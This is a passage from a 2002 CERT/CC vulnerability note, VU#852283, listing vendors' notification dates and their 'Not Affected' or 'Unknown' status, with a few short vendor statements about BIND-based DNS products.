PGP PUBLIC KEY BLOCK----- \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iQEVAwUBPdN4f3ey5gA9JdPZAQFYfgf/fBA6GtBHgChwqbfDmnbp0BQWrvnJKv97 \n4rwnnoF2HqsHRdR6d5W8xF4EOJaedzhotTFUDmy2CWUabWdpCgac79JSQ8iI+P8G \nN/Uv4o5kloBuvahTk0GHDoG5HVLQCaPbLZUnAWxcYzu57oQ+HaGJTF49cVfZhVkD \nKCGBwMgYwpWNUNQ3QcOl8liPqrNj6K512J4AivnjkCuXO0fsiXTuR7rPg7NgZzVn \nBoXhyt0Hvvk1zkkMf4JMGATdl6V5t2sK3YBsKPWEnd0yB3vqNYs3LUH3ArctsUXP \nc6DMP9p6++OJySP+Bb6Mg3h7JCbLqBMuuElppEbcApnE6JXFhGozBQ== \n=GZ1Z \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Cray Inc. __ Not Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCray Inc. is not vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### InfoBlox __ Not Affected\n\nNotified: November 12, 2002 Updated: October 18, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe Infoblox DNS One product is not vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Microsoft Corporation __ Not Affected\n\nNotified: November 12, 2002 Updated: November 14, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMicrosoft products do not use the program in question. Microsoft products are not affected by this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### MontaVista Software __ Not Affected\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMontaVista ships BIND 9, thus is not vulnerably to these advisories.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Nominum __ Not Affected\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNominum \"Foundation\" Authoritative Name Server (ANS) is not affected by this vulnerability. Also, Nominum \"Foundation\" Caching Name Server (CNS) is not affected by this vulnerability. Nominum's commercial DNS server products, which are part of Nominum \"Foundation\" IP Address Suite, are not based on BIND and do not contain any BIND code, and so are not affected by vulnerabilities discovered in any version of BIND.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### 3Com Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### AT&amp;T Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Adns Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Aladdin Knowledge Systems Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Alcatel Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Apache Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Apache-SSL Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Avaya Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### BSDI Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### BlueCat Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Check Point Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Cisco Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Cistron Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Command Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Compaq Computer Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Computer Associates Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Covalent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### CyberSoft Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### D-Link Systems Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Data Fellows Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Data General Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### F-Secure Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### F5 Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Finjan Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### FreeRADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Fujitsu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Funk Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### GFI Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### GNU glibc Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### IPlanet Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Inner Cite Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Intel Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Interlink Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Intersoft International Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Jkuo Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Juniper Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### KTH Kerberos Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Lachman Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Lotus Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Macromedia Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Mei Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Men&amp;Mice Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### MetaSolv Software Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### MiT Kerberos Development Team Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NCFTP Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NCSA Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NeXT Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### NetSNMP Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Network Associates Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Nixu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Nokia Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Open Group Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### OpenBSD Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Oracle Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### PSPL Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Process Software 